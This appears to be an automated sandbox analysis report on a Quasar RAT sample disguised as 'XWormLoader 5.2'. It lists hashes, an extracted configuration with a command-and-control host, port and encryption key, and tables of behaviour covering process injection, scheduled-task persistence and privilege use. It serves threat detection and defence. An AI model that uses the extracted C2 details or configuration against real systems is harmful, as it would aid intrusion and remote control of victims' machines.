quasar | 40c49ccfb00bd4ca02d587af4f03823650dde39b5fe31dcde8bbdc3fa508bea3

Analysis

max time kernel
150s
max time network
145s
platform
windows11-21h2_x64
resource
win11-20240426-en
resource tags

arch:x64arch:x86image:win11-20240426-enlocale:en-usos:windows11-21h2-x64system
submitted
03-05-2024 17:47

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

XWormLoader 5.2 x64.exe
Size

329KB
MD5

893ee266eef0ca3b11bdb859839df69d
SHA1

1d2eeab0c7ae7e9ec180017d8092f23abbea6d2b
SHA256

40c49ccfb00bd4ca02d587af4f03823650dde39b5fe31dcde8bbdc3fa508bea3
SHA512

694843c573f2aeec876eaa0ef329268553cde23cc4fdced9371041c3df097eec00b44894423ee00a7c9a1444f0bb17a089cb48c5430dfdaafa1265e5cd1b85f5
SSDEEP

6144:HfPtIkJwV7LtIgxfUFdLdassJFxgXS+vK5Qav9qm:HflXJwFmmUFdLs9H51

Score

10^/10

quasar slave spyware trojan

Malware Config

Extracted

Family

quasar

Version

3.1.5

Botnet

SLAVE

even-lemon.gl.at.ply.gg:33587

Mutex

$Sxr-3vDee7FzoJnhqjuE3n

Attributes

encryption_key
AqYe7s30CMq7SVM0oxKR
install_name
Discord.exe
log_directory
Logs
reconnect_delay
1000
startup_key
Discord
subdirectory
Discord

Signatures

Quasar RAT
Quasar is an open source Remote Access Tool.
trojan spyware quasar

Quasar payload 2 IoCs

Processes:

resource	yara_rule
C:\Users\Admin\AppData\Local\Temp\svchost.exe	family_quasar
behavioral3/memory/3604-26-0x0000000000750000-0x00000000007BC000-memory.dmp	family_quasar

Suspicious use of NtCreateProcessExOtherParentProcess 2 IoCs

Processes:

WerFault.exeWerFault.exe

description pid process target process

PID 4652 created 3592 4652 WerFault.exe cmd.exe
PID 2552 created 3592 2552 WerFault.exe cmd.exe

description	pid	process	target process
PID 4652 created 3592	4652	WerFault.exe	cmd.exe
PID 2552 created 3592	2552	WerFault.exe	cmd.exe

Suspicious use of NtCreateUserProcessOtherParentProcess 4 IoCs

Processes:

powershell.EXEsvchost.exepowershell.EXE

description	pid	process	target process
PID 1612 created 640	1612	powershell.EXE	winlogon.exe
PID 2624 created 3592	2624	svchost.exe	cmd.exe
PID 2624 created 3592	2624	svchost.exe	cmd.exe
PID 2688 created 640	2688	powershell.EXE	winlogon.exe

Checks BIOS information in registry 2 TTPs 2 IoCs

BIOS information is often read in order to detect sandboxing environments.

Query Registry

T1012

System Information Discovery

T1082

Processes:

wmiprvse.exe

description	ioc	process
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosDate	wmiprvse.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	wmiprvse.exe

Executes dropped EXE 5 IoCs

Processes:

svchost.exeXWormLoader 5.2 x32.exeDiscord.exeinstall.exeinstall.exe

pid process

3604 svchost.exe
4492 XWormLoader 5.2 x32.exe
396 Discord.exe
2336 install.exe
4616 install.exe
Legitimate hosting services abused for malware hosting/C2 1 TTPs 3 IoCs

Web Service
T1102

Processes:

flow ioc

1 raw.githubusercontent.com
6 raw.githubusercontent.com
10 raw.githubusercontent.com
Looks up external IP address via web service 1 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.

Processes:

flow ioc

1 ip-api.com

pid	process
3604	svchost.exe
4492	XWormLoader 5.2 x32.exe
396	Discord.exe
2336	install.exe
4616	install.exe

flow	ioc
1	raw.githubusercontent.com
6	raw.githubusercontent.com
10	raw.githubusercontent.com

flow	ioc
1	ip-api.com

Drops file in System32 directory 9 IoCs

Processes:

svchost.exesvchost.exepowershell.EXEOfficeClickToRun.exepowershell.EXE

description	ioc	process
File opened for modification	C:\Windows\System32\Winevt\Logs\Microsoft-Windows-Security-Mitigations%4UserMode.evtx	svchost.exe
File opened for modification	C:\Windows\System32\Tasks\$77Discord.exe	svchost.exe
File opened for modification	C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive	powershell.EXE
File opened for modification	C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Office\16.0\officeclicktorun.exe_Rules.xml	OfficeClickToRun.exe
File opened for modification	C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.EXE.log	powershell.EXE
File opened for modification	C:\Windows\System32\Winevt\Logs\Microsoft-Windows-Security-Mitigations%4KernelMode.evtx	svchost.exe
File opened for modification	C:\Windows\System32\Winevt\Logs\Microsoft-Windows-CloudStore%4Operational.evtx	svchost.exe
File opened for modification	C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive	powershell.EXE
File opened for modification	C:\Windows\System32\Tasks\$77svc64	svchost.exe

Suspicious use of SetThreadContext 2 IoCs

Processes:

powershell.EXEpowershell.EXE

description	pid	process	target process
PID 1612 set thread context of 2356	1612	powershell.EXE	dllhost.exe
PID 2688 set thread context of 4872	2688	powershell.EXE	dllhost.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082
Program crash 3 IoCs

Processes:

WerFault.exeWerFault.exeWerFault.exe

pid pid_target process target process

2388 4492 WerFault.exe XWormLoader 5.2 x32.exe
3332 3592 WerFault.exe cmd.exe
3792 3592 WerFault.exe cmd.exe

pid	pid_target	process	target process
2388	4492	WerFault.exe	XWormLoader 5.2 x32.exe
3332	3592	WerFault.exe	cmd.exe
3792	3592	WerFault.exe	cmd.exe

Checks processor information in registry 2 TTPs 14 IoCs

Processor information is often read in order to detect sandboxing environments.

Query Registry

T1012

System Information Discovery

T1082

Processes:

WerFault.exeWerFault.exe

description	ioc	process
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString	WerFault.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\VendorIdentifier	WerFault.exe
Key opened	\REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0	WerFault.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz	WerFault.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Revision	WerFault.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz	WerFault.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString	WerFault.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\VendorIdentifier	WerFault.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Identifier	WerFault.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Identifier	WerFault.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Platform Specific Field 1	WerFault.exe
Key opened	\REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0	WerFault.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Platform Specific Field 1	WerFault.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Revision	WerFault.exe

Creates scheduled task(s) 1 TTPs 4 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
persistence

Scheduled Task/Job
T1053

Processes:

schtasks.exeSCHTASKS.exeschtasks.exeSCHTASKS.exe

pid process

4740 schtasks.exe
1044 SCHTASKS.exe
4480 schtasks.exe
1952 SCHTASKS.exe

pid	process
4740	schtasks.exe
1044	SCHTASKS.exe
4480	schtasks.exe
1952	SCHTASKS.exe

Enumerates system info in registry 2 TTPs 4 IoCs

Query Registry

T1012

System Information Discovery

T1082

Processes:

WerFault.exeWerFault.exe

description	ioc	process
Key opened	\REGISTRY\MACHINE\Hardware\Description\System\BIOS	WerFault.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU	WerFault.exe
Key opened	\REGISTRY\MACHINE\Hardware\Description\System\BIOS	WerFault.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU	WerFault.exe

Modifies data under HKEY_USERS 64 IoCs

Processes:

powershell.EXEOfficeClickToRun.exepowershell.EXE

description	ioc	process
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CTLs	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CTLs	powershell.EXE
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesMetadata\officeclicktorun.exe\RulesEndpoint = "https://nexusrules.officeapps.live.com/nexus/rules?Application=officeclicktorun.exe&Version=16.0.12527.20470&ClientId={7133246C-BE95-441E-A4F9-31577D6A28C5}&OSEnvironment=10&MsoAppId=37&AudienceName=Production&AudienceGroup=Production&AppVersion=16.0.12527.20470&"	OfficeClickToRun.exe
Key deleted	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesMetadata\officeclicktorun.exe	OfficeClickToRun.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CTLs	powershell.EXE
Key deleted	\REGISTRY\USER\.DEFAULT\SOFTWARE\MICROSOFT\OFFICE\16.0\COMMON\CLIENTTELEMETRY\RULESMETADATA\OFFICECLICKTORUN.EXE\ULSMONITOR	OfficeClickToRun.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\Certificates	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CRLs	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CRLs	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CRLs	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CRLs	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CRLs	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CRLs	powershell.EXE
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesMetadata\officeclicktorun.exe\ULSMonitor\ULSTagIds0 = "5804129,17110992,7202269,41484365,17110988,7153487,39965824,17962391,508368333,17962392,3462423,3702920,3700754,3965062,4297094,7153421,18716193,7153435,7202265,20502174,6308191,18407617"	OfficeClickToRun.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CTLs	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CTLs	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CTLs	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CRLs	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CRLs	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CRLs	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CTLs	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\Certificates	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\Certificates	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CTLs	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\Certificates	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust	powershell.EXE
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesLastModified\officeclicktorun.exe = "Fri, 03 May 2024 17:49:32 GMT"	OfficeClickToRun.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesMetadata\officeclicktorun.exe\ULSMonitor\ULSCategoriesSeverities = "1329 50,1329 10,1329 15,1329 100,1329 6"	OfficeClickToRun.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\Certificates	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\Certificates	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\Certificates	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\Certificates	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\Certificates	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\Certificates	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesMetadata\officeclicktorun.exe	OfficeClickToRun.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\Certificates	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common	OfficeClickToRun.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CRLs	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CTLs	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CRLs	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CTLs	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CTLs	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry	OfficeClickToRun.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CRLs	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CTLs	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\Certificates	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CRLs	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\Certificates	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CRLs	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CRLs	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CTLs	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople	powershell.EXE

Runs ping.exe 1 TTPs 1 IoCs

Remote System Discovery
T1018

Processes:

PING.EXE

pid process

976 PING.EXE

pid	process
976	PING.EXE

Suspicious behavior: EnumeratesProcesses 64 IoCs

Processes:

powershell.EXEdllhost.exeDiscord.exewmiprvse.exe

pid	process
1612	powershell.EXE
1612	powershell.EXE
1612	powershell.EXE
2356	dllhost.exe
2356	dllhost.exe
2356	dllhost.exe
2356	dllhost.exe
2356	dllhost.exe
2356	dllhost.exe
2356	dllhost.exe
2356	dllhost.exe
2356	dllhost.exe
2356	dllhost.exe
396	Discord.exe
2356	dllhost.exe
2356	dllhost.exe
2356	dllhost.exe
2356	dllhost.exe
2356	dllhost.exe
2356	dllhost.exe
3084	wmiprvse.exe
2356	dllhost.exe
2356	dllhost.exe
2356	dllhost.exe
2356	dllhost.exe
2356	dllhost.exe
2356	dllhost.exe
2356	dllhost.exe
2356	dllhost.exe
2356	dllhost.exe
2356	dllhost.exe
396	Discord.exe
2356	dllhost.exe
2356	dllhost.exe
2356	dllhost.exe
2356	dllhost.exe
2356	dllhost.exe
2356	dllhost.exe
2356	dllhost.exe
2356	dllhost.exe
2356	dllhost.exe
2356	dllhost.exe
396	Discord.exe
2356	dllhost.exe
2356	dllhost.exe
2356	dllhost.exe
2356	dllhost.exe
2356	dllhost.exe
2356	dllhost.exe
2356	dllhost.exe
2356	dllhost.exe
2356	dllhost.exe
2356	dllhost.exe
396	Discord.exe
2356	dllhost.exe
2356	dllhost.exe
2356	dllhost.exe
2356	dllhost.exe
2356	dllhost.exe
2356	dllhost.exe
2356	dllhost.exe
2356	dllhost.exe
2356	dllhost.exe
2356	dllhost.exe

Suspicious use of AdjustPrivilegeToken 64 IoCs

Processes:

svchost.exeDiscord.exepowershell.EXEdllhost.exesvchost.exe

description	pid	process
Token: SeDebugPrivilege	3604	svchost.exe
Token: SeDebugPrivilege	396	Discord.exe
Token: SeDebugPrivilege	1612	powershell.EXE
Token: SeDebugPrivilege	1612	powershell.EXE
Token: SeDebugPrivilege	2356	dllhost.exe
Token: SeAssignPrimaryTokenPrivilege	2664	svchost.exe
Token: SeIncreaseQuotaPrivilege	2664	svchost.exe
Token: SeSecurityPrivilege	2664	svchost.exe
Token: SeTakeOwnershipPrivilege	2664	svchost.exe
Token: SeLoadDriverPrivilege	2664	svchost.exe
Token: SeSystemtimePrivilege	2664	svchost.exe
Token: SeBackupPrivilege	2664	svchost.exe
Token: SeRestorePrivilege	2664	svchost.exe
Token: SeShutdownPrivilege	2664	svchost.exe
Token: SeSystemEnvironmentPrivilege	2664	svchost.exe
Token: SeUndockPrivilege	2664	svchost.exe
Token: SeManageVolumePrivilege	2664	svchost.exe
Token: SeAssignPrimaryTokenPrivilege	2664	svchost.exe
Token: SeIncreaseQuotaPrivilege	2664	svchost.exe
Token: SeSecurityPrivilege	2664	svchost.exe
Token: SeTakeOwnershipPrivilege	2664	svchost.exe
Token: SeLoadDriverPrivilege	2664	svchost.exe
Token: SeSystemtimePrivilege	2664	svchost.exe
Token: SeBackupPrivilege	2664	svchost.exe
Token: SeRestorePrivilege	2664	svchost.exe
Token: SeShutdownPrivilege	2664	svchost.exe
Token: SeSystemEnvironmentPrivilege	2664	svchost.exe
Token: SeUndockPrivilege	2664	svchost.exe
Token: SeManageVolumePrivilege	2664	svchost.exe
Token: SeAssignPrimaryTokenPrivilege	2664	svchost.exe
Token: SeIncreaseQuotaPrivilege	2664	svchost.exe
Token: SeSecurityPrivilege	2664	svchost.exe
Token: SeTakeOwnershipPrivilege	2664	svchost.exe
Token: SeLoadDriverPrivilege	2664	svchost.exe
Token: SeSystemtimePrivilege	2664	svchost.exe
Token: SeBackupPrivilege	2664	svchost.exe
Token: SeRestorePrivilege	2664	svchost.exe
Token: SeShutdownPrivilege	2664	svchost.exe
Token: SeSystemEnvironmentPrivilege	2664	svchost.exe
Token: SeUndockPrivilege	2664	svchost.exe
Token: SeManageVolumePrivilege	2664	svchost.exe
Token: SeAssignPrimaryTokenPrivilege	2664	svchost.exe
Token: SeIncreaseQuotaPrivilege	2664	svchost.exe
Token: SeSecurityPrivilege	2664	svchost.exe
Token: SeTakeOwnershipPrivilege	2664	svchost.exe
Token: SeLoadDriverPrivilege	2664	svchost.exe
Token: SeSystemtimePrivilege	2664	svchost.exe
Token: SeBackupPrivilege	2664	svchost.exe
Token: SeRestorePrivilege	2664	svchost.exe
Token: SeShutdownPrivilege	2664	svchost.exe
Token: SeSystemEnvironmentPrivilege	2664	svchost.exe
Token: SeUndockPrivilege	2664	svchost.exe
Token: SeManageVolumePrivilege	2664	svchost.exe
Token: SeAssignPrimaryTokenPrivilege	2664	svchost.exe
Token: SeIncreaseQuotaPrivilege	2664	svchost.exe
Token: SeSecurityPrivilege	2664	svchost.exe
Token: SeTakeOwnershipPrivilege	2664	svchost.exe
Token: SeLoadDriverPrivilege	2664	svchost.exe
Token: SeSystemtimePrivilege	2664	svchost.exe
Token: SeBackupPrivilege	2664	svchost.exe
Token: SeRestorePrivilege	2664	svchost.exe
Token: SeShutdownPrivilege	2664	svchost.exe
Token: SeSystemEnvironmentPrivilege	2664	svchost.exe
Token: SeUndockPrivilege	2664	svchost.exe

Suspicious use of UnmapMainImage 2 IoCs

Processes:

Explorer.EXERuntimeBroker.exe

pid process

3340 Explorer.EXE
3884 RuntimeBroker.exe

pid	process
3340	Explorer.EXE
3884	RuntimeBroker.exe

Suspicious use of WriteProcessMemory 64 IoCs

Processes:

XWormLoader 5.2 x64.exesvchost.exeDiscord.exepowershell.EXEdllhost.exe

description	pid	process	target process
PID 1368 wrote to memory of 3604	1368	XWormLoader 5.2 x64.exe	svchost.exe
PID 1368 wrote to memory of 3604	1368	XWormLoader 5.2 x64.exe	svchost.exe
PID 1368 wrote to memory of 3604	1368	XWormLoader 5.2 x64.exe	svchost.exe
PID 1368 wrote to memory of 4492	1368	XWormLoader 5.2 x64.exe	XWormLoader 5.2 x32.exe
PID 1368 wrote to memory of 4492	1368	XWormLoader 5.2 x64.exe	XWormLoader 5.2 x32.exe
PID 1368 wrote to memory of 4492	1368	XWormLoader 5.2 x64.exe	XWormLoader 5.2 x32.exe
PID 3604 wrote to memory of 4480	3604	svchost.exe	schtasks.exe
PID 3604 wrote to memory of 4480	3604	svchost.exe	schtasks.exe
PID 3604 wrote to memory of 4480	3604	svchost.exe	schtasks.exe
PID 3604 wrote to memory of 396	3604	svchost.exe	Discord.exe
PID 3604 wrote to memory of 396	3604	svchost.exe	Discord.exe
PID 3604 wrote to memory of 396	3604	svchost.exe	Discord.exe
PID 3604 wrote to memory of 2336	3604	svchost.exe	install.exe
PID 3604 wrote to memory of 2336	3604	svchost.exe	install.exe
PID 3604 wrote to memory of 2336	3604	svchost.exe	install.exe
PID 3604 wrote to memory of 1952	3604	svchost.exe	SCHTASKS.exe
PID 3604 wrote to memory of 1952	3604	svchost.exe	SCHTASKS.exe
PID 3604 wrote to memory of 1952	3604	svchost.exe	SCHTASKS.exe
PID 396 wrote to memory of 4740	396	Discord.exe	schtasks.exe
PID 396 wrote to memory of 4740	396	Discord.exe	schtasks.exe
PID 396 wrote to memory of 4740	396	Discord.exe	schtasks.exe
PID 1612 wrote to memory of 2356	1612	powershell.EXE	dllhost.exe
PID 1612 wrote to memory of 2356	1612	powershell.EXE	dllhost.exe
PID 1612 wrote to memory of 2356	1612	powershell.EXE	dllhost.exe
PID 1612 wrote to memory of 2356	1612	powershell.EXE	dllhost.exe
PID 1612 wrote to memory of 2356	1612	powershell.EXE	dllhost.exe
PID 1612 wrote to memory of 2356	1612	powershell.EXE	dllhost.exe
PID 1612 wrote to memory of 2356	1612	powershell.EXE	dllhost.exe
PID 1612 wrote to memory of 2356	1612	powershell.EXE	dllhost.exe
PID 2356 wrote to memory of 640	2356	dllhost.exe	winlogon.exe
PID 2356 wrote to memory of 708	2356	dllhost.exe	lsass.exe
PID 2356 wrote to memory of 996	2356	dllhost.exe	svchost.exe
PID 2356 wrote to memory of 420	2356	dllhost.exe	dwm.exe
PID 2356 wrote to memory of 456	2356	dllhost.exe	svchost.exe
PID 2356 wrote to memory of 764	2356	dllhost.exe	svchost.exe
PID 2356 wrote to memory of 1076	2356	dllhost.exe	svchost.exe
PID 2356 wrote to memory of 1084	2356	dllhost.exe	svchost.exe
PID 2356 wrote to memory of 1164	2356	dllhost.exe	svchost.exe
PID 2356 wrote to memory of 1172	2356	dllhost.exe	svchost.exe
PID 2356 wrote to memory of 1272	2356	dllhost.exe	svchost.exe
PID 2356 wrote to memory of 1292	2356	dllhost.exe	svchost.exe
PID 2356 wrote to memory of 1400	2356	dllhost.exe	svchost.exe
PID 2356 wrote to memory of 1476	2356	dllhost.exe	svchost.exe
PID 2356 wrote to memory of 1496	2356	dllhost.exe	svchost.exe
PID 2356 wrote to memory of 1572	2356	dllhost.exe	svchost.exe
PID 2356 wrote to memory of 1596	2356	dllhost.exe	svchost.exe
PID 2356 wrote to memory of 1712	2356	dllhost.exe	svchost.exe
PID 2356 wrote to memory of 1728	2356	dllhost.exe	svchost.exe
PID 2356 wrote to memory of 1748	2356	dllhost.exe	svchost.exe
PID 2356 wrote to memory of 1828	2356	dllhost.exe	svchost.exe
PID 2356 wrote to memory of 1872	2356	dllhost.exe	svchost.exe
PID 2356 wrote to memory of 1884	2356	dllhost.exe	svchost.exe
PID 2356 wrote to memory of 1904	2356	dllhost.exe	svchost.exe
PID 2356 wrote to memory of 2004	2356	dllhost.exe	svchost.exe
PID 2356 wrote to memory of 1256	2356	dllhost.exe	svchost.exe
PID 2356 wrote to memory of 2096	2356	dllhost.exe	spoolsv.exe
PID 2356 wrote to memory of 2232	2356	dllhost.exe	svchost.exe
PID 2356 wrote to memory of 2408	2356	dllhost.exe	svchost.exe
PID 2356 wrote to memory of 2416	2356	dllhost.exe	svchost.exe
PID 2356 wrote to memory of 2472	2356	dllhost.exe	svchost.exe
PID 2356 wrote to memory of 2524	2356	dllhost.exe	svchost.exe
PID 2356 wrote to memory of 2596	2356	dllhost.exe	svchost.exe
PID 2356 wrote to memory of 2616	2356	dllhost.exe	sysmon.exe
PID 2356 wrote to memory of 2652	2356	dllhost.exe	svchost.exe

C:\Windows\system32\winlogon.exe
winlogon.exe
1⤵
PID:640

C:\Windows\system32\dwm.exe
"dwm.exe"
2⤵
PID:420

C:\Windows\System32\dllhost.exe
C:\Windows\System32\dllhost.exe /Processid:{9edf36f4-8ff6-4cd5-b545-07bbffea0ba1}
2⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:2356

C:\Windows\System32\dllhost.exe
C:\Windows\System32\dllhost.exe /Processid:{70442150-baf2-4258-b143-d39f18318265}
2⤵
PID:4872

C:\Windows\system32\lsass.exe
C:\Windows\system32\lsass.exe
1⤵
PID:708

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k DcomLaunch -p -s LSM
1⤵
PID:996

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s gpsvc
1⤵
PID:456

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p -s lmhosts
1⤵
PID:764

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s NcbService
1⤵
PID:1076

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s TimeBrokerSvc
1⤵
PID:1084

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s Schedule
1⤵
- Drops file in System32 directory
PID:1164

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE
